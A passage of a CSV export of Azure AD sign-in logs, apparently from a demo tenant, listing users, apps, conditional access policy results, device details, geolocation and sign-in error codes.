+355,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:14.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:04,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",73238be9-0fa9-467e-aa3e-6d7965b86500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,73238be9-0fa9-467e-aa3e-6d7965b86500,SigninLogs,Sucess,35.01296997,-80.93171692
+356,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:24.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7a0a3bcd-cad1-4442-984b-9e6d85522248,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",1dc1286f-da3f-4a48-9584-fc8fa90e1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1dc1286f-da3f-4a48-9584-fc8fa90e1700,SigninLogs,Sucess,35.01296997,-80.93171692
+357,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:03.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b7953748-e587-4e11-89a3-b9266bd8b8fc,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:54,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",135d752f-7d39-4839-9efc-9a2d25805200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,135d752f-7d39-4839-9efc-9a2d25805200,SigninLogs,Sucess,32.32146072,34.85319901
+358,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:06.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5f996146-33d7-43c2-927c-cdb91348e5e7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",2b6dd05c-6ab3-47f4-b023-40d011db1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2b6dd05c-6ab3-47f4-b023-40d011db1600,SigninLogs,Sucess,33.7984581,-84.38828278
+359,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:17.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,39182242-cde6-4137-81a5-e52b32a39c54,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7b8d94b8-c096-4787-a5e7-93d364fd1700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."", 'additionalDetails': 'MFA completed in Azure AD'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7b8d94b8-c096-4787-a5e7-93d364fd1700,SigninLogs,Failed,50.6406517,5.572050095
+360,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:40.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50126,None,Invalid username or password or Invalid on-premise username or password.,0,c23e9762-ecae-4491-948b-01668c6ecfc2,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,[],notApplied,09/04/2020 15:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",8a945db4-b61d-4e46-b881-75d823f01600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],"{'errorCode': 50126, 'failureReason': 'Invalid username or password or Invalid on-premise username or password.'}",CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8a945db4-b61d-4e46-b881-75d823f01600,SigninLogs,Failed,35.01296997,-80.93171692
+361,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:26.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f0b8d587-28e9-432b-b34a-9e3fa2ca09ed,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5fa972fe-7fa8-4b4b-bbdd-e6020a2f1900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5fa972fe-7fa8-4b4b-bbdd-e6020a2f1900,SigninLogs,Sucess,33.7984581,-84.38828278
+362,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:17.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,39182242-cde6-4137-81a5-e52b32a39c54,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7b8d94b8-c096-4787-a5e7-93d364fd1700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."", 'additionalDetails': 'MFA completed in Azure AD'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7b8d94b8-c096-4787-a5e7-93d364fd1700,SigninLogs,Failed,50.6406517,5.572050095
+363,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:17.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,39182242-cde6-4137-81a5-e52b32a39c54,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 